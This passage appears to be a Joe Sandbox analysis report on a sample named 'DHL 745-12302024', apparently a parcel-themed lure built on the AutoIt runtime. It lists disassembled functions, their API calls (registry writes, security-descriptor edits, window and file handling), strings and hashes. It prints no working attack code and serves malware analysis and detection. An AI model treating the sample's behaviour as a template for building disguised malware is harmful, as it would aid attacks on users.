Part of subcall function 00AC2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AC2BFA

Strings

@U=u, xrefs: 00AF0A54
COLLAPSE, xrefs: 00AF0B01, 00AF0B1C
CHECK, xrefs: 00AF0A85, 00AF0AA0
UNCHECK, xrefs: 00AF0D3E
ISCHECKED, xrefs: 00AF0CE1
GETTEXT, xrefs: 00AF0C97
GETSELECTED, xrefs: 00AF0C4E
GETTOTALCOUNT, xrefs: 00AF09F2, 00AF0A17
SELECT, xrefs: 00AF0D11
EXISTS, xrefs: 00AF0B7C, 00AF0B97
GETITEMCOUNT, xrefs: 00AF0C1E
EXPAND, xrefs: 00AF0BF8

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-383632319
Opcode ID: de52e28cdb109beaf7952fa607f2c27b85a7e893a39efa54a5b70f1c0b2e4cf3
Instruction ID: 3d0add1df1f526f8fa58ca0dccee717750027e6004a64eacd41af5205fbfd2ac
Opcode Fuzzy Hash: de52e28cdb109beaf7952fa607f2c27b85a7e893a39efa54a5b70f1c0b2e4cf3
Instruction Fuzzy Hash: E6E189362083058FC714EF64C550D2AB7F1BF98358B15899DF99A9B3A2DB30ED45CB81

Function 00AC0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AC1114
Part of subcall function 00AC10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00AC0B9B,?,?,?), ref: 00AC1120
Part of subcall function 00AC10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AC0B9B,?,?,?), ref: 00AC112F
Part of subcall function 00AC10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AC0B9B,?,?,?), ref: 00AC1136
Part of subcall function 00AC10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AC114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AC0DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AC0E29
GetLengthSid.ADVAPI32(?), ref: 00AC0E40
GetAce.ADVAPI32(?,00000000,?), ref: 00AC0E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AC0E96
GetLengthSid.ADVAPI32(?), ref: 00AC0EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00AC0EB5
HeapAlloc.KERNEL32(00000000), ref: 00AC0EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AC0EDD
CopySid.ADVAPI32(00000000), ref: 00AC0EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AC0F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AC0F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AC0F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC0F6E
HeapFree.KERNEL32(00000000), ref: 00AC0F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC0F7E
HeapFree.KERNEL32(00000000), ref: 00AC0F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC0F8E
HeapFree.KERNEL32(00000000), ref: 00AC0F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00AC0FA1
HeapFree.KERNEL32(00000000), ref: 00AC0FA8

Part of subcall function 00AC1193: GetProcessHeap.KERNEL32(00000008,00AC0BB1,?,00000000,?,00AC0BB1,?), ref: 00AC11A1
Part of subcall function 00AC1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00AC0BB1,?), ref: 00AC11A8
Part of subcall function 00AC1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00AC0BB1,?), ref: 00AC11B7

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: ff1f5459124b855f6e119e46f3ea90ddffe3fdd746e6ee2e98a5f2fa9d4b0269
Instruction ID: 9ef28b98f4fda62b7509820f0310e91faee1342e16cd25e2b02abf8006b4ca1a
Opcode Fuzzy Hash: ff1f5459124b855f6e119e46f3ea90ddffe3fdd746e6ee2e98a5f2fa9d4b0269
Instruction Fuzzy Hash: 88718C7290021AEBDF20DFE5DD44FAEBBB8BF04350F054219F919E6191DB309A56CBA0

Function 00AF833C Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AF835A
_wcslen.LIBCMT ref: 00AF836E
_wcslen.LIBCMT ref: 00AF8391
_wcslen.LIBCMT ref: 00AF83B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AF83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00AF361A,?), ref: 00AF844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AF8487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00AF84CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AF8501
FreeLibrary.KERNEL32(?), ref: 00AF850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AF851D
DestroyIcon.USER32(?), ref: 00AF852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AF8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AF8555

Strings

.icl, xrefs: 00AF8368
@U=u, xrefs: 00AF8535
.dll, xrefs: 00AF83AB
.exe, xrefs: 00AF8388

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl$@U=u
API String ID: 799131459-1639919054
Opcode ID: 3d92c2f6a9e9a042d47f7e83abe782abd619d02b5268fe1af12f4ef8f35bca84
Instruction ID: be5dfdb0575db1ec67416701ea4ba26dbf35120df13e4da6b05b073acc837d92
Opcode Fuzzy Hash: 3d92c2f6a9e9a042d47f7e83abe782abd619d02b5268fe1af12f4ef8f35bca84
Instruction Fuzzy Hash: 0461F27154021ABBEB14DFA4CD41BBE77A8FF08B21F104649F916DA1D1DF78A980C7A0

Function 00AEC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AEC4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,00AFCC08,00000000,?,00000000,?,?), ref: 00AEC544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00AEC5A4
_wcslen.LIBCMT ref: 00AEC5F4
_wcslen.LIBCMT ref: 00AEC66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00AEC6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00AEC7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00AEC84D
RegCloseKey.ADVAPI32(?), ref: 00AEC881
RegCloseKey.ADVAPI32(00000000), ref: 00AEC88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00AEC960

Strings

REG_SZ, xrefs: 00AEC644
REG_DWORD, xrefs: 00AEC804
REG_QWORD, xrefs: 00AEC8C3
REG_MULTI_SZ, xrefs: 00AEC6F5
REG_BINARY, xrefs: 00AEC913
REG_EXPAND_SZ, xrefs: 00AEC5CD

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 768c3c079e1b74b58315885c260caf67013ae90c2d035db59868aea259196898
Instruction ID: 60e463983e5185c2c14b5b9239864c36741c28df87dc31342865a9e454c248b5
Opcode Fuzzy Hash: 768c3c079e1b74b58315885c260caf67013ae90c2d035db59868aea259196898
Instruction Fuzzy Hash: E01279352042419FD714DF15C981A2AB7F5FF88724F14889DF89A9B3A2DB31ED42CB91

Function 00AEC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AEB6AE,?,?), ref: 00AEC9B5
_wcslen.LIBCMT ref: 00AEC9F1
_wcslen.LIBCMT ref: 00AECA68
_wcslen.LIBCMT ref: 00AECA9E
_wcslen.LIBCMT ref: 00AECAF9
_wcslen.LIBCMT ref: 00AECB2F
_wcslen.LIBCMT ref: 00AECB7F

Strings

HKEY_CURRENT_USER, xrefs: 00AECBBD
HKCR, xrefs: 00AECB29, 00AECB2E
HKEY_USERS, xrefs: 00AECBDF
HKU, xrefs: 00AECBF0
HKEY_LOCAL_MACHINE, xrefs: 00AECA62, 00AECA67
HKLM, xrefs: 00AECA98, 00AECA9D
HKEY_CLASSES_ROOT, xrefs: 00AECAF3, 00AECAF8
HKCU, xrefs: 00AECBCE
HKCC, xrefs: 00AECBAC
HKEY_CURRENT_CONFIG, xrefs: 00AECB79, 00AECB7E

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 236202f3557902c72eb7f95d3e9a6925acac857980bea0318456432309eb60fc
Instruction ID: 4f93c83c17481f2ee02e300c8084ee38458ee5bc89f667b32967da058bc95c0e
Opcode Fuzzy Hash: 236202f3557902c72eb7f95d3e9a6925acac857980bea0318456432309eb60fc
Instruction Fuzzy Hash: 1571F9336001AA8BCB20DF7EDD515BF33A6AFA47B4B254524F86997284EA31CD46C390

Function 00A67778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

Cannot parse #include, xrefs: 00AA5279
#ce, xrefs: 00A678ED
Unterminated group of comments, xrefs: 00AA528C
#include, xrefs: 00A67847
#cs, xrefs: 00A67873, 00A678C5
#pragma compile, xrefs: 00A677D3
', xrefs: 00AA5169
#notrayicon, xrefs: 00A677E7
Bad directive syntax error, xrefs: 00AA519A
#comments-start, xrefs: 00A6785F, 00A678B1
#include-once, xrefs: 00A6782F
#requireadmin, xrefs: 00A677FF
#comments-end, xrefs: 00A678D9
#OnAutoItStartRegister, xrefs: 00A67817
", xrefs: 00AA5153

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 7e93209683860aeea6eb5acfc93aae494601d54793af496e2bbf8124c6d7ea63
Instruction ID: acbc2f52ded5890ab7c710c9b8da1dd7cad28ec1c0b7bfdc44a3444714c7c204
Opcode Fuzzy Hash: 7e93209683860aeea6eb5acfc93aae494601d54793af496e2bbf8124c6d7ea63
Instruction Fuzzy Hash: FE81CC71A14209BBDB21BF60CE42FBE37B8BF15304F144424F909AB196EB74DA41CBA5

Function 00AF856F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00AF8592
GetFileSize.KERNEL32(00000000,00000000), ref: 00AF85A2
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00AF85AD
CloseHandle.KERNEL32(00000000), ref: 00AF85BA
GlobalLock.KERNEL32(00000000), ref: 00AF85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00AF85D7
GlobalUnlock.KERNEL32(00000000), ref: 00AF85E0
CloseHandle.KERNEL32(00000000), ref: 00AF85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00AF85F8
OleLoadPicture.OLEAUT32(?,00000000,00000000,00AFFC38,?), ref: 00AF8611
GlobalFree.KERNEL32(00000000), ref: 00AF8621
GetObjectW.GDI32(?,00000018,000000FF), ref: 00AF8641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00AF8671
DeleteObject.GDI32(00000000), ref: 00AF8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00AF86AF

Strings

@U=u, xrefs: 00AF86AF

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID: @U=u
API String ID: 3840717409-2594219639
Opcode ID: 1bdad56d6b5a7d19e1c94fed19ad35699f139e2e85bcac2a4f94fcbbb639b628
Instruction ID: 4716ca16aeb2e9b85072b4d2df67a2335a26d064e94fce7a06f30b39cde29081
Opcode Fuzzy Hash: 1bdad56d6b5a7d19e1c94fed19ad35699f139e2e85bcac2a4f94fcbbb639b628
Instruction Fuzzy Hash: CE410975600208AFDB11DFE6CD48EBABBB8EF89761F104158F905EB260DB349902DB60

Function 00A800C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00A800C6

Part of subcall function 00A800ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00B3070C,00000FA0,8313748A,?,?,?,?,00AA23B3,000000FF), ref: 00A8011C
Part of subcall function 00A800ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00AA23B3,000000FF), ref: 00A80127
Part of subcall function 00A800ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00AA23B3,000000FF), ref: 00A80138
Part of subcall function 00A800ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00A8014E
Part of subcall function 00A800ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A8015C
Part of subcall function 00A800ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A8016A
Part of subcall function 00A800ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A80195
Part of subcall function 00A800ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A801A0

___scrt_fastfail.LIBCMT ref: 00A800E7

Part of subcall function 00A800A3: __onexit.LIBCMT ref: 00A800A9

Strings

WakeAllConditionVariable, xrefs: 00A80162
SleepConditionVariableCS, xrefs: 00A80154
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A80122
InitializeConditionVariable, xrefs: 00A80148
kernel32.dll, xrefs: 00A80133

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 3b01c49f284ac05edc54c558490aef7408177b87a4645ab9e22658ec7dc4d049
Instruction ID: ce2ea3bf4c697cee56a836e06a7520b52ddc904ac5feeb96e3b9d8b44cd7227d
Opcode Fuzzy Hash: 3b01c49f284ac05edc54c558490aef7408177b87a4645ab9e22658ec7dc4d049
Instruction Fuzzy Hash: 3621F232640705AFE760BBE4AD0AF3E36A8EF05BB0F104629F901A3291DB749C048B94

Function 00AC30F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AC318D
_wcslen.LIBCMT ref: 00AC31F8

Strings

CLASSNN, xrefs: 00AC31F3, 00AC3204
INSTANCE, xrefs: 00AC3453
CLASS, xrefs: 00AC3188, 00AC31A5
REGEXPCLASS, xrefs: 00AC3255, 00AC3266
NAME, xrefs: 00AC3335, 00AC3346
TEXT, xrefs: 00AC347C

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: a55c3a365a8ae706cc85d75196a9cb22dcb3da0744c3a69b1c531c9e9522ef32
Instruction ID: 0f0e87985379fa69f99d3e620035958677e25679efd9634e968a126be22d7fb1
Opcode Fuzzy Hash: a55c3a365a8ae706cc85d75196a9cb22dcb3da0744c3a69b1c531c9e9522ef32
Instruction Fuzzy Hash: 99E1A333A00526AFCF289FA8C951FEDBBB4BF54710F56C15DE456A7240DB30AE858790

Function 00AD44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00AFCC08), ref: 00AD4527
_wcslen.LIBCMT ref: 00AD453B
_wcslen.LIBCMT ref: 00AD4599
_wcslen.LIBCMT ref: 00AD45F4
_wcslen.LIBCMT ref: 00AD463F
_wcslen.LIBCMT ref: 00AD46A7

Part of subcall function 00A7F9F2: _wcslen.LIBCMT ref: 00A7F9FD

GetDriveTypeW.KERNEL32(?,00B26BF0,00000061), ref: 00AD4743

Strings

fixed, xrefs: 00AD4635, 00AD463A
ramdisk, xrefs: 00AD46F1
unknown, xrefs: 00AD4708
network, xrefs: 00AD469D, 00AD46A2
removable, xrefs: 00AD45EA, 00AD45EF
all, xrefs: 00AD4531, 00AD4536
cdrom, xrefs: 00AD458F, 00AD4594

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 744aad3a3e63f25adbd3520ee2afa3d4af34126e7bbf83b4ae316d217325e3e1
Instruction ID: 4e0c46495f50cf1b551e31a89505e89fd2593437d523f0d371c435fdeb0e9d2d
Opcode Fuzzy Hash: 744aad3a3e63f25adbd3520ee2afa3d4af34126e7bbf83b4ae316d217325e3e1
Instruction Fuzzy Hash: 7BB1CA316083029FC720DF28D991A6AB7F5AFA9760F50491EF49BC7391E730D845CBA2

Function 00AF6CD9 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00AF6DEB

Part of subcall function 00A66B57: _wcslen.LIBCMT ref: 00A66B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AF6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AF6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AF6E94
DestroyWindow.USER32(?), ref: 00AF6EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A60000,00000000), ref: 00AF6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AF6EFD
GetDesktopWindow.USER32 ref: 00AF6F16
GetWindowRect.USER32(00000000), ref: 00AF6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AF6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AF6F4D

Part of subcall function 00A79944: GetWindowLongW.USER32(?,000000EB), ref: 00A79952

Strings

@U=u, xrefs: 00AF6E81, 00AF6E94, 00AF6EFD, 00AF6F27
tooltips_class32, xrefs: 00AF6E58, 00AF6EDD
0, xrefs: 00AF6D98

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$@U=u$tooltips_class32
API String ID: 2429346358-1130792468
Opcode ID: 162151bbde0fb1728825adff6253208a479f7a9759c11fe128e505c1fc6d3256
Instruction ID: 562db8c3027d98bbc40dc69857a6f60629fd71ebbdca34ad904f359b97830c74
Opcode Fuzzy Hash: 162151bbde0fb1728825adff6253208a479f7a9759c11fe128e505c1fc6d3256
Instruction Fuzzy Hash: E2716671144248AFDB21CF98DD48BBABBF9FB89314F14491DFA8987261CB70AD06DB11

Function 00AF911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A79BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A79BB2

DragQueryPoint.SHELL32(?,?), ref: 00AF9147

Part of subcall function 00AF7674: ClientToScreen.USER32(?,?), ref: 00AF769A
Part of subcall function 00AF7674: GetWindowRect.USER32(?,?), ref: 00AF7710
Part of subcall function 00AF7674: PtInRect.USER32(?,?,00AF8B89), ref: 00AF7720

SendMessageW.USER32(?,000000B0,?,?), ref: 00AF91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AF91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AF91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AF9225
SendMessageW.USER32(?,000000B0,?,?), ref: 00AF923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00AF9255
SendMessageW.USER32(?,000000B1,?,?), ref: 00AF9277
DragFinish.SHELL32(?), ref: 00AF927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00AF9371

Strings

@GUI_DROPID, xrefs: 00AF929E
@GUI_DRAGFILE, xrefs: 00AF9320
@U=u, xrefs: 00AF91B0, 00AF9225, 00AF923E, 00AF9255, 00AF9277
@GUI_DRAGID, xrefs: 00AF92E9

Memory Dump Source

